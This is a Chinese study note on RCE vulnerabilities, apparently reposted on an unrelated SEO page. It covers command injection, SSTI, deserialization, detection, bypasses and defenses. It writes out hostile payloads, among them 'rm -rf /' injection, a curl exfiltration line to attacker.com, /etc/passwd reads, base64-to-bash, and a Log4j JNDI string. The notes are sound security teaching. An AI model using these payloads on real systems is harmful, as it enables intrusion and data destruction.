当前位置: 首页 > news >正文

建网站的流程及注意事项/天猫代运营

建网站的流程及注意事项,天猫代运营,网页制作和设计实验报告,网站建设的知识RCE漏洞学习笔记 1. 基本概念 定义:攻击者通过漏洞在目标服务器上执行任意命令或代码 危害等级:高危(直接影响服务器控制权) 常见场景: Web应用参数未过滤(如URL、表单、HTTP头) 反序列化漏…

RCE漏洞学习笔记

1. 基本概念

  • 定义:攻击者通过漏洞在目标服务器上执行任意命令或代码

  • 危害等级:高危(直接影响服务器控制权)

  • 常见场景

    • Web应用参数未过滤(如URL、表单、HTTP头)

    • 反序列化漏洞

    • 第三方组件漏洞(如Log4j2、Fastjson)

    • 文件上传 + 解析漏洞


2. RCE漏洞类型

2.1 命令注入(Command Injection)

  • 原理:通过拼接系统命令执行恶意指令

  • 示例

    php

    // PHP示例
    $ip = $_GET['ip'];
    system("ping -c 4 " . $ip);  // 攻击者输入:127.0.0.1; rm -rf /
  • 常用Payload

    ; command          # Unix分号分隔
    | command          # 管道符
    && command         # 逻辑与
    || command         # 逻辑或
    `command`          # 反引号执行
    $(command)         # 子shell执行

2.2 反序列化RCE

  • 原理:利用反序列化操作触发危险方法(如PHP的__destruct、Java的readObject

  • 经典漏洞

    • Java: Fastjson(CVE-2022-25845)、Jackson

    • Python: Pickle反序列化

    • PHP: Phar反序列化

2.3 模板注入(SSTI)

  • 原理:模板引擎解析用户输入为代码

    python

    # Flask示例(Jinja2)
    @app.route('/hello/<name>')
    def hello(name):return render_template_string(f'Hello {name}!')
    # 攻击输入:{{7*7}} → 输出Hello 49!
  • 常见引擎

    • Java: FreeMarker、Velocity

    • Python: Jinja2、Mako

    • PHP: Twig、Smarty

2.4 其他类型

  • 文件包含漏洞php://input + POST代码执行

  • 表达式注入:SpEL(Spring)、OGNL(Struts2)

  • 内存破坏漏洞:缓冲区溢出(C/C++程序)


3. 实战利用技巧

3.1 检测方法

  • 黑盒测试

    • 输入特殊字符测试命令拼接(; | >等)

    • 使用延时命令判断(如ping -c 4 127.0.0.1sleep 5

    • DNS外带数据检测:curl http://attacker.com/$(whoami)

  • 白盒审计

    • 搜索危险函数:

      bash

      # PHP
      system(), exec(), passthru(), eval()
      # Java
      Runtime.getRuntime().exec()
      # Python
      os.system(), subprocess.run()

3.2 常用工具

  • 漏洞扫描

    • Burp Suite(手工测试)

    • Nuclei(自动化模板)

  • 利用框架

    • Metasploit(exploit/multi/http/log4shell_rce

    • SQLMap(--os-shell参数)

  • Payload生成

    • RevShells(反向Shell生成)

    • CyberChef(编码转换)

3.3 绕过防御

  • 过滤绕过

    bash

    # 空格绕过
    cat</etc/passwd
    {cat,/etc/passwd}
    ​
    # 关键字绕过
    c\at /etc/passwd
    c''at /etc/passwd
  • 编码绕过

    bash

    # Base64
    echo 'whoami' | base64 → d2hvYW1pCg==
    echo d2hvYW1pCg== | base64 -d | bash

4. 防御方案

4.1 输入处理

  • 白名单验证:限制用户输入格式(如IP地址正则)

  • 敏感字符过滤:移除; | &等危险符号

  • 参数化处理:避免直接拼接命令

    python

    # 错误方式
    os.system(f"ping {ip}")
    ​
    # 正确方式(Python示例)
    subprocess.run(['ping', '-c', '4', ip], check=True)

4.2 安全配置

  • 最小权限原则:运行服务的用户使用低权限账户

  • 禁用危险函数

    php

    ; php.ini
    disable_functions = system, exec, passthru
  • 沙箱隔离:使用Docker容器或沙箱环境运行不可信代码

4.3 其他防护

  • WAF规则:拦截常见RCE特征(如/etc/passwdwhoami

  • 日志监控:记录命令执行行为并设置告警

  • 依赖管理:及时更新第三方库(如修复Log4j2)


5. 经典漏洞案例

  1. Log4j2 RCE(CVE-2021-44228)

    • 利用Payload:${jndi:ldap://attacker.com/exp}

    • 防御:升级到Log4j 2.17.0+

  2. Spring4Shell(CVE-2022-22965)

    • 利用条件:JDK 9+ + Tomcat部署

    • 攻击路径:通过数据绑定修改日志路径上传Webshell

  3. Apache Struts2 RCE(S2-045)

    • 漏洞点:错误处理时的OGNL表达式执行

    • Payload示例:%{(#_='multipart/form-data').(...)}


6. 学习资源

  • 靶场练习

    • DVWA(Command Injection模块)

    • PortSwigger Web Security Academy

    • VulnHub漏洞环境

  • 参考资料

    • OWASP Top 10(A03: Injection)

    • PayloadsAllTheThings - RCE

    • 《白帽子讲Web安全》

http://www.whsansanxincailiao.cn/news/30345114.html

相关文章:

  • 佛山南海网站开发/网站权重怎么看
  • wordpress怎么开放注册/网络优化公司
  • 专门做宠物食品的网站/快速优化排名公司推荐
  • 海南网站开发公司/可以看封禁网站的浏览器
  • 长春网站排名公司/百度电脑版下载安装
  • 新乡网站开发的公司/收录查询api
  • 网站老提示有风险/经典的软文广告
  • 岑溪网站开发/青岛最新消息
  • 做电影分享网站违法吗/北京网站建设公司大全
  • 网站专题效果图怎么做/国外免费ip地址
  • 如何做网站的客服/平台推广计划
  • 佛山手工活外发加工网/黑龙江seo关键词优化工具
  • 企业宣传册免费模板网站/聊城seo
  • wordpress社交网站/百度帐号注册
  • 个人博客网站开发/在线一键生成网页
  • 做网站建设的公司排名/如何制作一个网站
  • 美橙建站怎么样/网站自动推广软件免费
  • 网站网络优化/网站制作维护
  • 网站后台没有编辑器/友情链接可以随便找链接加吗
  • react做门户网站/手机创建网站免费注册
  • 做问答营销的网站有哪些/重庆seo怎么样
  • 网站开发运营工程师待遇/站长工具app
  • 北京高端品牌网站定制/百度手机app下载并安装
  • 什么网站可以做字体效果/代刷网站推广链接0元价格
  • 学网站软件设计/互联网推广渠道有哪些
  • 查营业执照用什么软件/推广seo是什么意思
  • 做网站平台应该注意哪些/海外游戏推广平台
  • 古典风格网站源码/东莞网络推广及优化
  • 成都十大景观设计公司/成都网站改版优化
  • 自主网站建设/开鲁网站seo